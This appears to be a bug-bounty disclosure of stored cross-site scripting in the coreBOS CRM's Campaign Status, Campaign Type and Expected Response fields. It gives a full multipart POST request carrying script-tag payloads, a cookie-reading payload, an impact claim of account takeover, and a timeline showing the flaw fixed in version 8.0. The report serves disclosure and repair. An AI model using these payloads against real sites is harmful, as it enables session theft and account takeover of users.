Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Valid

Reported on

Dec 17th 2021


Description

coreBOS is vulnerable to Stored Cross-Site Scripting in the Campaign Type - Campaign Status - Expected Response fields.

Request

POST /index.php HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1374125012794036086279201745
Content-Length: 5630
Cookie: democoreboscom=86b8cecae7a5f8d1e2fa41116a7e1ffc; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=5443767136630943

-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="__vt5rftk"

sid:8d924f3e290e596062c746c014dd15397aae2871,1639753607
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="pagenumber"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="module"

Campaigns
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="record"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="mode"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="action"

Save
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_module"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_id"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_action"

DetailView
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="return_viewname"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="createmode"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="search_url"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaignname"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaign_no"

AUTO GEN ON SAVE
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigntype"

U
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaignstatus"

<script>alert(1)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="campaigntype"

<script>alert(2)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id_type"

Products
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="product_id_display"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="targetaudience"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="closingdate"

-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="sponsor"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="targetsize"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="numsent"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="budgetcost"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualcost"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedresponse"

<script>alert(4)</script>
-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedrevenue"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedsalescount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualsalescount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedresponsecount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualresponsecount"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="expectedroi"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="actualroi"


-----------------------------1374125012794036086279201745
Content-Disposition: form-data; name="description"


-----------------------------1374125012794036086279201745--

Payload

<script>alert(document.cookie)</script>

Impact

This vulnerability is capable of stealing users' cookies and gaining full account take over through his credentials.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
Muhammad Adel submitted a
a year ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
Joe Bordes validated this vulnerability a year ago
Muhammad Adel has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed in 8.0 with commit 4d4ba6 a year ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
42P2_to_50.php#L2883-L2901 has been validated
Muhammad Adel
a year ago

Researcher


Thanks for your quick validation, just a note, this report contains XSS in three different places and issued the same amount of bounty as it was one. I am seeing some people reporting every vulnerability separately should I make this also?

Thanks again,

to join this conversation